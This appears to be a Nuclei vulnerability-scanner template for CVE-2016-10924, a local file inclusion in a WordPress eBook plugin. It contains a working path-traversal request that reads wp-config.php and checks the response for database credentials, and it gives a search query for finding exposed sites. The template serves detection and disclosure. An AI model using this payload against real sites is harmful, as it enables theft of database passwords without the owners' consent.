id: CVE-2016-10924 info: name: Wordpress Zedna eBook download <1.2 - Local File Inclusion author: idealphase severity: high description: | Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability. impact: | An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution. remediation: | Update to the latest version of the plugin to fix the vulnerability. reference: - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - https://wordpress.org/plugins/ebook-download/#developers classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 epss-score: 0.01488 epss-percentile: 0.85357 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: zedna_ebook_download_project product: zedna_ebook_download framework: wordpress google-query: inurl:"/wp-content/plugins/ebook-download" tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a00473045022100f5e4573ee0a629024d4991c7d74d8584819a3bc1b340c6997776cd28d3116af002201f9e8bd5418f20ba3c159818d714073f0e700281290f1a794d519371336ff08f:922c64590222798bb761d5b6d8e72950